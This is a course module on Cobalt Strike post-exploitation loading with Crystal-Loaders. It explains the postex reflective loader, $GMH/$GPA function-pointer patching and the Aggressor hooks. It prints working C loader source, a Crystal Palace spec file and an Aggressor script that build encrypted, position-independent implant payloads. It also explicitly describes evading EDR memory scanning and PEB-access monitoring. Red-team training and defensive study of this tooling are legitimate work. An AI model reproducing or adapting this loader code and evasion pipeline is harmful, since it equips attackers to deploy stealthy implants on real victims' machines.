Module 7: Post-Ex UDRL & Aggressor Integration
The postex loader, $GMH/$GPA patching, string-based DFR, Aggressor hooks, and the complete build pipeline from C source to deployed Beacon.
Module Objective
Understand how Cobalt Strike's post-exploitation DLLs are loaded by a separate, simplified UDRL. You will learn how the postex loader differs from the Beacon UDRL, how it receives API resolution capabilities from its parent Beacon via $GMH/$GPA patching, and how the Aggressor script ties the entire Crystal-Loaders system together. By the end of this module you will be able to trace a complete payload from C source through Crystal Palace to a running Beacon on target.
1. What Is Post-Ex?
Cobalt Strike's post-exploitation capabilities — mimikatz, screenshot, keylogger, port scan, hashdump, net commands, and many others — are implemented as standalone DLLs. When an operator runs one of these commands through the Beacon console, Cobalt Strike compiles or selects the appropriate postex DLL and sends it to the running Beacon for execution.
These postex DLLs need their own loader. The initial Beacon UDRL (covered in Modules 5 and 6) loads the Beacon implant itself, but every subsequent postex capability that arrives as a DLL also needs to be reflectively loaded into memory. Cobalt Strike provides a dedicated hook for this purpose: POSTEX_RDLL_GENERATE.
Why a Separate Loader?
The postex loader is architecturally simpler than the Beacon UDRL because it operates in a fundamentally different context. The Beacon is already running, API resolution is already solved, syscall stubs are already resolved, and the BUD (Beacon User Data) is already populated. The postex loader does not need to bootstrap any of this infrastructure — it inherits resolution capabilities from its parent Beacon via function pointer patching.
Key Distinction
The POSTEX_RDLL_GENERATE Aggressor hook allows operators to replace the default postex loader with a custom one — just as BEACON_RDLL_GENERATE allows replacing the Beacon's own loader. Crystal-Loaders provides both: a full-featured Beacon UDRL and a streamlined postex UDRL, each with its own spec file and C source.
2. Key Differences from the Beacon UDRL
The postex loader shares the same Crystal Palace build system and LibTCG PE loading primitives as the Beacon UDRL, but it strips away everything that the parent Beacon already provides. The following table highlights every architectural difference:
| Aspect | Beacon UDRL (loader.c) | Post-Ex UDRL (loader.c) |
|---|---|---|
| Includes | beacon.h, gate.h, tcg.h | tcg.h only |
| Syscall resolution | Full SYSCALL_API via LibGate | None needed |
| DFR method | ror13 (hash-based) | strings (ASCII name-based) |
| API resolution | PEB walking via findModuleByHash | $GMH/$GPA from parent Beacon |
| BUD population | Full BEACON_USER_DATA | None |
| Entry params | go() takes no args | go(void* loaderArguments) |
| DllMain calls | 3 (BEACON_USER_DATA, ATTACH, START) | 2 (ATTACH, START) |
| Memory tracking | ALLOCATED_MEMORY_REGION | RDATA_SECTION |
| Section masking | Full section tracking | .rdata capture only |
The most striking reduction is in dependencies. The Beacon UDRL includes beacon.h (for BUD structures), gate.h (for LibGate syscalls), and tcg.h (for PE loading). The postex loader only needs tcg.h because it does not resolve syscalls and does not populate BUD. It is purely a PE loading engine with inherited API resolution.
Why This Matters for Evasion
A smaller loader means a smaller PIC blob, which means less code in memory to scan, fewer function calls to trace, and a reduced detection surface. The postex loader also avoids touching the PEB directly (it uses patched-in function pointers instead of PEB walking), which sidesteps PEB access monitoring that some EDR products implement.
3. The $GMH / $GPA Patching Mechanism
The central design question for the postex loader is: how does it resolve Windows API functions without PEB walking and without LibGate? The answer is function pointer patching. The parent Beacon already has resolved addresses for GetModuleHandleA and GetProcAddress. Crystal Palace writes those addresses directly into the postex loader's code before it executes.
Global Function Pointers in .text
The postex loader.c declares two global function pointers with an unusual attribute — they are placed in the .text section instead of .data:
C (postex/loader.c)// Global function pointers stored in .text section
__typeof__(GetModuleHandleA) * pGetModuleHandle __attribute__((section(".text")));
__typeof__(GetProcAddress) * pGetProcAddress __attribute__((section(".text")));
Placing them in .text is deliberate. After Crystal Palace transforms the COFF object into PIC, the .text section becomes the executable code body. By placing the pointers here, they become part of the PIC blob itself — directly addressable via RIP-relative instructions. If they were in .data, Crystal Palace would need to handle an additional data section and relocations.
The patch Directive
The postex spec file uses Crystal Palace's patch directive to write values into these symbol locations:
loader.spec (postex)name "Beacon Postex Loader"
describe "PIC loader for Cobalt Strike's postex DLLs"
author "Daniel Duggan (@_RastaMouse)"
x64:
load "bin/loader.x64.o"
make pic +gofirst +optimize +disco
dfr "resolve" "strings"
patch "pGetModuleHandle" $GMH
patch "pGetProcAddress" $GPA
mergelib "../libtcg.x64.zip"
generate $KEY 128
push $DLL
xor $KEY
preplen
link "dll"
push $KEY
preplen
link "key"
export
The $GMH and $GPA variables are not defined in the spec itself. They are provided externally by the Aggressor script at runtime, which receives them from Cobalt Strike as parameters to the POSTEX_RDLL_GENERATE hook. Crystal Palace resolves the symbol names "pGetModuleHandle" and "pGetProcAddress" in the COFF object's symbol table and overwrites those locations with the 8-byte addresses provided by $GMH and $GPA.
$GMH / $GPA Patching Flow
has resolved GMH/GPA
passes to Aggressor hook
patch directive
pointers baked in .text
Comparing Spec Directives: Beacon vs Post-Ex
| Directive | Beacon Spec | Post-Ex Spec |
|---|---|---|
dfr | "resolve" "ror13" | "resolve" "strings" |
patch | Not used | patch "pGetModuleHandle" $GMHpatch "pGetProcAddress" $GPA |
mergelib | LibGate + LibTCG | LibTCG only |
4. The Post-Ex resolve() Function
Because the postex spec uses dfr "resolve" "strings", Crystal Palace rewrites all __imp_MODULE$Function references to call resolve() with ASCII string arguments instead of ROR13 hashes. The postex resolve() function is correspondingly different from the Beacon UDRL's version:
C (postex/loader.c)char * resolve(char * module, char * function)
{
HANDLE hModule = pGetModuleHandle(module);
if (hModule == NULL)
hModule = LoadLibraryA(module);
return pGetProcAddress(hModule, function);
}
This function is deceptively simple, but every line is significant:
Line-by-Line Analysis
| Line | What It Does |
|---|---|
pGetModuleHandle(module) | Attempts to get a handle to the module using the patched $GMH pointer. This succeeds if the DLL is already loaded in the process (e.g., kernel32.dll, ntdll.dll). |
if (hModule == NULL) | If the module is not already loaded, the function needs to load it first. This happens when postex DLLs import from less common DLLs. |
LoadLibraryA(module) | Calls LoadLibraryA directly to load the module. This is available as a plain function call because it comes from <windows.h> and is not DFR-decorated. |
pGetProcAddress(hModule, function) | Finally resolves the target function from the (now loaded) module and returns its address. |
Comparison with Beacon UDRL resolve()
Beacon UDRL resolve()
- Takes two DWORD hashes (ROR13)
- Walks the PEB's
InMemoryOrderModuleList - Hashes each module name, compares against
moduleHash - Walks export table, hashes each function name
- No dependency on any external function pointers
- Fully self-contained — works from a cold start
Post-Ex resolve()
- Takes two ASCII strings (module name, function name)
- Calls
pGetModuleHandle(patched$GMH) - Falls back to
LoadLibraryA(direct call, not DFR-decorated) if module not loaded - Calls
pGetProcAddress(patched$GPA) - Depends on parent Beacon's function pointers
- Cannot operate independently — requires a running Beacon
5. RDATA_SECTION Tracking
The Beacon UDRL tracks all allocated memory regions via ALLOCATED_MEMORY_REGION structures in the BUD. The postex loader uses a simpler tracking mechanism: it captures only the .rdata section's location and size.
C (postex/loader.c)typedef struct {
char * start; // Start address of .rdata
DWORD length; // Size of .rdata
DWORD offset; // Offset of IAT within .rdata
} RDATA_SECTION;
Why Track .rdata?
Long-running postex DLLs — such as the keylogger, screenshot capture loop, or port scanner — persist in memory for extended periods. While they are idle between operations, their memory is vulnerable to scanning. The .rdata section is the highest-value forensic target because it contains:
What Lives in .rdata
- The Import Address Table (IAT) — An array of resolved function pointers to APIs in
ntdll.dll,kernel32.dll, and other system DLLs. These pointers are recognizable patterns: consecutive addresses within the same DLL's export range. - String literals — Read-only strings used by the postex DLL (error messages, format strings, registry key paths).
- Virtual function tables — For C++ postex DLLs, vtable pointers reside in
.rdata. - Constant data — Any
constglobal data the compiler places in read-only sections.
By passing the RDATA_SECTION structure to the postex DLL via DllMain(DLL_PROCESS_ATTACH, &rdata), the DLL can XOR-encrypt or zero its own .rdata section while idle. When it needs to run again, it decrypts the section, performs its operation, and re-encrypts. This pattern is the postex equivalent of the sleep mask technique used by the Beacon itself.
RDATA Obfuscation Lifecycle
.rdata populated with IAT
keylogger cycle done
using RDATA_SECTION info
no readable IAT in memory
6. The Post-Ex go() Function
The postex go() function is the entry point of the PIC blob. Crystal Palace places it at byte offset 0 via the +gofirst flag. Unlike the Beacon UDRL's go() (which takes no arguments), the postex version receives a loaderArguments pointer from the parent Beacon:
C (postex/loader.c)void go(void * loaderArguments)
{
RESOURCE * dll = (RESOURCE *)GETRESOURCE(_DLL_);
RESOURCE * key = (RESOURCE *)GETRESOURCE(_KEY_);
// XOR unmask the encrypted postex DLL
char * src = KERNEL32$VirtualAlloc(
NULL, dll->length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
for (DWORD i = 0; i < dll->length; i++)
src[i] = dll->value[i] ^ key->value[i % key->length];
// Parse the decrypted PE
DLLDATA data;
ParseDLL(src, &data);
// Allocate and load sections
IMPORTFUNCS funcs;
DWORD size = SizeOfDLL(&data);
char * dst = KERNEL32$VirtualAlloc(
NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
LoadDLL(&data, dst);
ProcessImports(&funcs, &data, dst);
// Fix permissions and capture .rdata info
RDATA_SECTION rdata;
FixSectionPermissions(&data, dst, &rdata);
// Get entry point and clean up decryption buffer
DLLMAIN_FUNC entryPoint = (DLLMAIN_FUNC)EntryPoint(&data, dst);
KERNEL32$VirtualFree(src, 0, MEM_RELEASE);
// Two DllMain calls (no USER_DATA needed)
entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, &rdata); // pass rdata info
entryPoint((HINSTANCE)GETRESOURCE(go), 0x04, loaderArguments); // start with loader args
}
Each phase of this function maps directly to a stage in the loading process:
Phase-by-Phase Breakdown
| Phase | Lines | What Happens |
|---|---|---|
| Resource Retrieval | GETRESOURCE | The _DLL_ and _KEY_ macros resolve to named sections that Crystal Palace linked into the PIC blob. GETRESOURCE uses RIP-relative addressing to locate them. |
| XOR Decryption | VirtualAlloc + XOR loop | Allocates a RW buffer (src) and decrypts the postex DLL using a rolling XOR with the 128-byte key. The decrypted buffer is a raw PE file. |
| PE Parsing | ParseDLL | LibTCG parses the PE headers, section table, import directory, and relocation table into a DLLDATA structure. |
| Section Loading | LoadDLL | Allocates the final image region (RW) and copies each PE section to its correct virtual address offset. |
| Import Resolution | ProcessImports | Takes an IMPORTFUNCS struct, the DLLDATA, and dst. Walks the import directory and resolves each function using the DFR-rewritten resolve(), which delegates to the patched $GMH/$GPA. |
| Permission Fixing | FixSectionPermissions | Sets correct page protections for each section (.text to RX, .rdata to R, .data to RW). Captures .rdata boundaries into the RDATA_SECTION struct. |
| Cleanup | VirtualFree | Releases the temporary decryption buffer (src). The encrypted DLL data and XOR key are no longer needed. |
| DllMain #1 | DLL_PROCESS_ATTACH | Calls the postex DLL's entry point with (HINSTANCE)dst and &rdata as the reserved parameter, giving it the information needed for .rdata obfuscation. |
| DllMain #2 | 0x04 | Calls DllMain again with reason 0x04, passing (HINSTANCE)GETRESOURCE(go) as the module handle and loaderArguments from the parent Beacon, starting the actual postex operation (mimikatz dump, screenshot capture, etc.). |
Contrast with Beacon UDRL go()
The Beacon UDRL's go() function makes three DllMain calls:
Beacon UDRL: Three DllMain Calls
entryPoint((HINSTANCE)0, DLL_BEACON_USER_DATA, &bud)— passes theBEACON_USER_DATAstructure using the specialDLL_BEACON_USER_DATAreason code and(HINSTANCE)0as the module handleentryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL)— standard DLL initialization with the actual loaded image baseentryPoint((HINSTANCE)GETRESOURCE(go), DLL_BEACON_START, NULL)— starts the Beacon main loop
The postex loader skips the first call entirely because there is no BEACON_USER_DATA to pass. Postex DLLs do not need syscall stubs or memory region tracking — they operate within the context of an already-running Beacon that handles those concerns.
7. The Aggressor Script (crystalpalace.cna)
The Aggressor script is the glue that connects Crystal Palace to Cobalt Strike's runtime. It implements the hooks that Cobalt Strike calls when it needs to generate loader payloads, passing the appropriate parameters to the Crystal Palace linker.
Java/Sleep (crystalpalace.cna)import crystalpalace.spec.* from: crystalpalace.jar;
import java.util.HashMap;
set BEACON_RDLL_GENERATE {
local('$spec $spec_path $result');
// $1 = filename, $2 = beacon DLL bytes, $3 = arch
if ($3 eq "x86") { return $null; } // x64 only
$spec_path = getFileProper(script_resource("udrl"), "loader.spec");
$spec = [LinkSpec Parse: $spec_path];
$result = [$spec run: $2, new HashMap];
if (strlen($result) == 0) {
warn("Crystal Palace: BEACON_RDLL_GENERATE failed");
return $null;
}
return $result;
}
set BEACON_RDLL_SIZE {
return "0"; // dynamic size
}
set POSTEX_RDLL_GENERATE {
local('$spec $spec_path $hashMap $result');
// $1 = filename, $2 = postex DLL bytes, $3 = arch
// $4 = beacon ID, $5 = $GMH, $6 = $GPA
if ($3 eq "x86") { return $null; }
$spec_path = getFileProper(script_resource("postex-udrl"), "loader.spec");
$spec = [LinkSpec Parse: $spec_path];
$hashMap = new HashMap;
[$hashMap put: "\$GMH", cast($5, 'b')];
[$hashMap put: "\$GPA", cast($6, 'b')];
$result = [$spec run: $2, $hashMap];
if (strlen($result) == 0) {
warn("Crystal Palace: POSTEX_RDLL_GENERATE failed");
return $null;
}
return $result;
}
The three hooks each serve a distinct purpose in the payload generation pipeline. Note that in Cobalt Strike's Sleep language, the set keyword assigns named hook callbacks (such as RDLL hooks), while on registers event handlers — these are different mechanisms. The import java.util.HashMap at the top makes the Java HashMap class available for passing patch variables.
BEACON_RDLL_GENERATE
Hook: BEACON_RDLL_GENERATE
When it fires: Every time Cobalt Strike generates a Beacon payload (HTTP listener, HTTPS listener, SMB pipe, etc.).
Parameters received:
$1— The filename hint (e.g.,"beacon.dll")$2— The raw Beacon DLL bytes (the PE file that needs to be loaded)$3— The architecture string ("x86"or"x64")
What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the Beacon UDRL spec. Feeds it the Beacon DLL bytes (which become $DLL in the spec) and returns the complete PIC payload. The new HashMap is empty because the Beacon spec has no external variables to patch. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.
Return value: The final PIC shellcode blob, or $null if the architecture is x86 (Crystal-Loaders is x64-only) or if Crystal Palace fails.
BEACON_RDLL_SIZE
Hook: BEACON_RDLL_SIZE
When it fires: Before BEACON_RDLL_GENERATE, to determine how much space to reserve for the loader.
Return value: "0" indicates the loader size is dynamic. Crystal Palace determines the exact size at link time based on the code, libraries, and encrypted payload. Returning "0" tells Cobalt Strike not to pre-allocate a fixed buffer but to accept whatever size Crystal Palace produces.
POSTEX_RDLL_GENERATE
Hook: POSTEX_RDLL_GENERATE
When it fires: Every time an operator runs a postex command (mimikatz, screenshot, keylogger, etc.) that requires loading a DLL into the Beacon process.
Parameters received:
$1— The filename hint (e.g.,"mimikatz.dll")$2— The raw postex DLL bytes$3— The architecture string$4— The parent Beacon's ID (integer)$5— The parent Beacon'sGetModuleHandleAaddress ($GMH)$6— The parent Beacon'sGetProcAddressaddress ($GPA)
What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the postex spec. Constructs a HashMap containing $GMH and $GPA as byte arrays (via cast($5, 'b')), and passes both the DLL bytes and the hash map to Crystal Palace. The patch directives in the spec resolve $GMH and $GPA from this hash map. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.
Return value: The complete postex PIC payload with patched-in function pointers, or $null on failure.
The HashMap is the Bridge
The key insight is how data flows from Cobalt Strike through Aggressor into Crystal Palace. The $GMH and $GPA values originate from the running Beacon on the target machine. Cobalt Strike resolves them from Beacon's process context, passes them as parameters to the Aggressor hook, and the script packages them into a HashMap that Crystal Palace reads when processing patch directives. By the time the PIC blob is assembled, the correct function addresses are baked directly into the shellcode's .text section.
8. The Full Build Pipeline
From writing C source code to a running Beacon on target, the Crystal-Loaders system involves eight distinct stages. The following diagram traces the complete pipeline:
Complete Crystal-Loaders Build Pipeline
loader.c with go() entry point, resolve() function, and PE loading logic using LibTCG primitives.x86_64-w64-mingw32-gcc -c loader.c -o bin/loader.x64.o produces a COFF object file. The -c flag stops before linking.loader.spec defining the PIC transformation, DFR method, library merges, payload encryption, and data linking.BEACON_RDLL_GENERATE (or POSTEX_RDLL_GENERATE), passing the raw DLL bytes and architecture info to the Aggressor script..cna script calls LinkSpec Parse to load and parse the spec file, preparing the Crystal Palace linker engine.Crystal Palace Sub-Operations (Step 6)
| Sub-Step | Operation | Result |
|---|---|---|
| 6a | Load loader.x64.o | COFF object loaded into linker memory |
| 6b | make pic +gofirst +optimize +disco | COFF transformed to PIC with go() at offset 0 |
| 6c | dfr "resolve" "ror13" (or "strings") | All DLL import references rewritten to call resolve() |
| 6d | mergelib LibGate + LibTCG (or LibTCG only) | Library code merged into the PIC blob |
| 6e | generate $KEY 128 | 128-byte random XOR key created |
| 6f | push $DLL / xor / preplen / link | DLL XOR-encrypted, length-prefixed, linked as named section |
go()). The loader decrypts the embedded DLL, loads it via LibTCG, resolves imports via DFR, and calls DllMain to start Beacon.Pipeline Summary
The pipeline transforms human-readable C code into a flat, encrypted, position-independent shellcode blob that loads a full-featured DLL implant from memory. At no point in this pipeline does a traditional PE file exist in the target process's memory. The DLL is encrypted inside the PIC blob, decrypted into a temporary buffer, loaded section-by-section into a final allocation, and the temporary buffer is freed. The only persistent artifacts are the PIC code itself (which has no PE headers) and the loaded DLL sections (which have correct per-section permissions instead of a single RWX blob).
Module 7 Knowledge Check
Q1: How does the postex loader resolve Windows API functions?
pGetModuleHandle and pGetProcAddress) in the .text section. Crystal Palace's patch directive writes the parent Beacon's GetModuleHandleA ($GMH) and GetProcAddress ($GPA) addresses into these locations at link time. The postex resolve() function then uses these patched pointers to resolve all API imports. No PEB walking or syscalls are needed.Q2: What Aggressor hook handles Beacon UDRL generation?
BEACON_RDLL_GENERATE fires every time Cobalt Strike generates a Beacon payload. It receives the raw Beacon DLL bytes, architecture string, and filename hint. The Aggressor script loads the Beacon UDRL spec file and returns the Crystal Palace PIC output. POSTEX_RDLL_GENERATE handles postex DLL loading, BEACON_RDLL_SIZE reports the loader size, and ARTIFACT_GENERATE is a different hook for artifact packaging.Q3: Why does the postex loader track RDATA_SECTION instead of full ALLOCATED_MEMORY?
.rdata section contains the resolved Import Address Table (IAT), which holds function pointers that memory scanners can identify as evidence of a loaded PE. By tracking the .rdata section's start address, size, and IAT offset via the RDATA_SECTION structure, the postex DLL can XOR-encrypt its own .rdata while idle and decrypt it only when actively executing, similar to how the Beacon's sleep mask protects its own memory.